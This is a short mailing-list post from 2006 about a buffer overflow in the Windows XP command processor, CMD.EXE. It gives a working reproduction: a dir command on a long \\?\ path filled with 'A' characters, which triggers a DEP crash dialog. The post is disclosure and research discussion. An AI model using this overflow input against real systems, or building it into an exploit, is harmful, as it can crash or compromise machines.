Vulnerability Development mailing list archives
RE: Windows Command Processor CMD.EXE Buffer Overflow
From: "Marvin Simkin" <Marvin.Simkin () asu edu>
Date: Mon, 23 Oct 2006 08:05:29 -0700
> Just for clarifying if you executed the command properly -- "\\?\" is required after dir cmd, and not one with the single slash "\?\". To reproduce the issue in WinXP SP2,
Sorry, one of the backslashes got lost somehow in copy and paste. With two backslashes it works as advertised and I get the DEP dialog.

C:\>cmd
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>%COMSPEC% /K "dir \\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

[DEP dialog here]

C:\>